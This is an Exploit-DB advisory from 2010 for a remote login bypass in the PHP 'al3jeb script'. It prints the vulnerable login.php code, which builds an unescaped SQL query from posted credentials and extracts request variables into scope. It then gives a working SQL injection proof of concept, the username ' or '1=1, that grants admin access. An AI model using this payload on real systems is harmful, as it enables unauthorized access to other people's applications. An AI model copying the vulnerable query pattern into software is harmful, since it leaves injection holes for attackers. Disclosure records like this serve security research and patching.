al3jeb script - Remote Authentication Bypass

EDB-ID:

11198

CVE:

N/A

Author:

cr4wl3r

Type:

webapps

Platform:

PHP

Published:

2010-01-19

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |      al3jeb script Remote Login Bypass Exploit     |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Date: 19.01.2010
[!] Remote: yes

[!] Vulnerability Code [login.php] :

<?
session_start();
extract($_POST); 
extract($_GET); 
extract($_SESSION); 
extract($_COOKIE);
?>
<?php
include("Connections/config.php");
if(isset($_POST['Submit']))
{
 $u=$_POST["uname"];
 $p=$_POST["pwd"];
 $r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'");
 
if($row=mysql_fetch_array($r))
{
 $_SESSION['AdminName']=$u;
 if(isset($re))
 {
 setcookie("username",$u,time()+3600);
 }
 header("location:index.php");
 
}
}
?>


[!] PoC: [al3jebscript]/login.php

    username : ' or '1=1
    password : cr4wl3r